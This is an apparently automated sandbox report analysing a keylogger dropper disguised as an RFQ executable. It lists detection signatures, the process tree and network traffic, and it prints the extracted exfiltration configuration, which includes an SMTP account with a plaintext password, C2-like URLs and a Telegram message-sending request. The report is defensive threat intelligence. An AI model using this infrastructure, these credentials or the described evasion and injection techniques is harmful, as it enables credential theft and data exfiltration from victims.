Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe

Overview

General Information

Sample name:RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
Analysis ID:1587370
MD5:02bc82a10c674c5c8f60d293e22a544e
SHA1:7b6aecdc2468eb633ddec37397e55fc778c824c2
SHA256:8b672671606f402445e1d10caf2f59a41e36ae4201d189ac202f5c7c0c66f3a4
Tags:exeuser-julianmckein
Infos:

Detection

DarkTortilla, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe (PID: 7380 cmdline: "C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe" MD5: 02BC82A10C674C5C8F60D293E22A544E)
    • InstallUtil.exe (PID: 7968 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DarkTortillaDarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2475804920.0000000005620000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
    00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2daa0:$a1: get_encryptedPassword
          • 0x2e028:$a2: get_encryptedUsername
          • 0x2d713:$a3: get_timePasswordChanged
          • 0x2d82a:$a4: get_passwordField
          • 0x2dab6:$a5: set_encryptedPassword
          • 0x307d2:$a6: get_passwords
          • 0x30b66:$a7: get_logins
          • 0x307be:$a8: GetOutlookPasswords
          • 0x30177:$a9: StartKeylogger
          • 0x30abf:$a10: KeyLoggerEventArgs
          • 0x30217:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 22 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.42e56b0.2.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
            0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.5620000.6.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
              0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.42e56b0.2.raw.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.5620000.6.raw.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                  0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 72 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-10T09:29:21.137570+010028033053Unknown Traffic192.168.2.449882104.21.48.1443TCP
                    2025-01-10T09:29:24.456913+010028033053Unknown Traffic192.168.2.449906104.21.48.1443TCP
                    2025-01-10T09:29:25.579354+010028033053Unknown Traffic192.168.2.449915104.21.80.1443TCP
                    2025-01-10T09:29:26.637643+010028033053Unknown Traffic192.168.2.449923104.21.80.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-10T09:29:19.770796+010028032742Potentially Bad Traffic192.168.2.449871193.122.130.080TCP
                    2025-01-10T09:29:20.598929+010028032742Potentially Bad Traffic192.168.2.449871193.122.130.080TCP
                    2025-01-10T09:29:21.661416+010028032742Potentially Bad Traffic192.168.2.449885193.122.130.080TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-10T09:29:29.795113+010018100071Potentially Bad Traffic192.168.2.449946149.154.167.220443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587"}
                    Multi AV Scanner detection for submitted file
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeReversingLabs: Detection: 36%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Tries to detect the country of the analysis system (by using the IP)
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49877 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49946 version: TLS 1.2
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]0_2_080BA6DF
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]0_2_080BA6E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 02A3F8E9h5_2_02A3F631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 02A3FD41h5_2_02A3FA88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06690D0Dh5_2_06690B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06691697h5_2_06690B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06692C19h5_2_06692968
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066931E0h5_2_06692DC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0669E501h5_2_0669E258
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0669E0A9h5_2_0669DE00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0669E959h5_2_0669E6B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0669F209h5_2_0669EF60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0669EDB1h5_2_0669EB08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0669F661h5_2_0669F3B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_06690040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0669FAB9h5_2_0669F810
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0669D3A1h5_2_0669D0F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0669CF49h5_2_0669CCA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0669D7F9h5_2_0669D550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066931E0h5_2_0669310E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066931E0h5_2_06692DC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0669DC51h5_2_0669D9A8

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49946 -> 149.154.167.220:443
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.raw.unpack, type: UNPACKEDPE
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813435%0D%0ADate%20and%20Time:%2010/01/2025%20/%2014:05:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813435%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49885 -> 193.122.130.0:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49871 -> 193.122.130.0:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49906 -> 104.21.48.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49882 -> 104.21.48.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49915 -> 104.21.80.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49923 -> 104.21.80.1:443
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49877 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813435%0D%0ADate%20and%20Time:%2010/01/2025%20/%2014:05:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813435%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 08:29:29 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: InstallUtil.exe, 00000005.00000002.2997558088.00000000061F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeString found in binary or memory: http://ocsp.comodoca.com0
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeString found in binary or memory: http://ocsp.sectigo.com0
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeString found in binary or memory: http://ocsp.sectigo.com0B
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
